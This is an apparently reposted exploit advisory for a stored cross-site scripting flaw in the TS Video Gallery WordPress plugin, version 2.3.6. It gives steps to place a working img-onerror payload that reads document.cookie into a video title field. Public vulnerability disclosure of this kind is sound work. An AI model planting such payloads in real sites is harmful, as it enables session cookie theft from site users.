WordPress Gallery 2.3.6 Cross Site Scripting
2024-7-3 05:6:53 Author: cxsecurity.com(查看原文) 阅读量:2 收藏

# Exploit Title: Wordpress Gallery Version 2.3.6 Stored XSS # Date: 2024-07-01 # Exploit Author: tmrswrr # Category : Webapps # Vendor Homepage: https://total-soft.com/wp-video-gallery/ # Version 2.3.6 ### Steps to Execute the Payload: 1. **Access the Admin Panel:** - Navigate to the admin panel of your WordPress site. - Go to `TS Video Gallery > `Create ` > ` Use Theme` via the following URL: ``` https://127.0.0.1/wp-admin/admin.php?page=tsvg-builder&tsvg-theme=grid_video_gallery ``` 2. **Insert the Payload:** - In the **Click New Video** section, **Write Add Title insert the following payload: ``` "><img src=x onerrora=confirm() onerror=confirm(document.cookie)> ``` 3. **Save and Verify:** - You should see the payload executed.



 

Thanks for you comment!
Your message is in quarantine 48 hours.


文章来源: https://cxsecurity.com/issue/WLB-2024070001
如有侵权请联系:admin#unsafe.sh